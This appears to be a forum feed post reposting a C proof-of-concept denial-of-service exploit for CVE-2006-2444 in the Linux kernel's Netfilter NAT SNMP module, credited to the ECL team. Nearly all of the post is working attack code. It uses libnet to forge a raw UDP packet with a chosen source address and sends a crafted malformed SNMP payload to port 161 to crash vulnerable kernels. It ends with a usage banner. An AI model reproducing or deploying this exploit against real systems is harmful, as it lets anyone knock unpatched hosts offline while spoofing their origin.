<![CDATA[Latest posts for the topic "Linux Kernel NetFilter DoS (Exploit)"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net Linux Kernel NetFilter DoS (Exploit) * Yuri Gushin * * A patch review we did on the 2.6.16.17->18 Linux kernel source tree revealed * a restructuring of code in the snmp_parse_mangle() and the snmp_trap_decode() * functions. After further research it turned out to be a vulnerability * previously reported[1] and assigned with CVE-2006-2444. For more details, * the version change log. * * * * 1) http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.18 * * -- * Greets fly out to the ECL crew - Valentin Slavov, Dimityr Manevski. * To stranger, shrink, the Console Pimps crew (blexim, ex0, hugin, w00f, matt, * kyu, kbd and the rest), our favorite soldier boy Sagi Horev, the SigMIL crew, * izik, tanin00, and everyone else we left out. * * P.S. - blexim, how are your FACECRABS ???? :)))) * */ #ifndef _BSD_SOURCE #define _BSD_SOURCE #endif #include #include #include #include void banner(); void usage(char *); char pwnage[] = "\x30\x0a\x02\x01\x00\x04\x03\x45\x43\x4c\xa4\x00"; int main(int argc, char **argv) { char errbuf[LIBNET_ERRBUF_SIZE]; libnet_t *l; int c; u_char *buf; int packet_len = 0; struct ip *IP; struct udphdr *UDP; u_int32_t src = 0, dst = 0; banner(); if (argc < 3) usage(argv[0]); if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) { fprintf(stderr, "[!] libnet_init() failed: %s", errbuf); exit(-1); } if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "[!] Unresolved source address.\n"); exit(-1); } if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "[!] Unresolved destination address.\n"); exit(-1); } if ((buf = malloc(IP_MAXPACKET)) == NULL) { perror("malloc"); exit(-1); } UDP = (struct udphdr *)(buf + LIBNET_IPV4_H); packet_len = LIBNET_IPV4_H + LIBNET_UDP_H + sizeof(pwnage) - 1; srand(time(NULL)); IP = (struct ip *) buf; IP->ip_v = 4; /* version 4 */ IP->ip_hl = 5; /* header length */ IP->ip_tos = 0; /* IP tos */ IP->ip_len = htons(packet_len); /* total length */ IP->ip_id = rand(); /* IP ID */ IP->ip_off = htons(0); /* fragmentation flags */ IP->ip_ttl = 64; /* time to live */ IP->ip_p = IPPROTO_UDP; /* transport protocol */ IP->ip_sum = 0; IP->ip_src.s_addr = src; IP->ip_dst.s_addr = dst; UDP->uh_sport = rand(); UDP->uh_dport = (argc > 3) ? htons((u_short)atoi(argv[3])) : htons(161); UDP->uh_ulen = htons(LIBNET_UDP_H + sizeof(pwnage) - 1); UDP->uh_sum = 0; memcpy(buf + LIBNET_IPV4_H + LIBNET_UDP_H, pwnage, sizeof(pwnage) - 1); libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_UDP, packet_len - LIBNET_IPV4_H); if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1) { fprintf(stderr, "[!] Write error: %s\n", libnet_geterror(l)); exit(-1); } printf("[+] Packet sent.\n"); libnet_destroy(l); free(buf); return (0); } void usage(char *cmd) { printf("[!] Usage: %s [port]\n", cmd); exit(-1); } void banner() { printf("\t\tNetfilter NAT SNMP module DoS exploit\n" "\t\t Yuri Gushin \n" "\t\t Alex Behar \n" "\t\t\t ECL Team\n\n\n"); } /* EoF */]]> /hvaonline/posts/list/96.html#393 /hvaonline/posts/list/96.html#393 GMT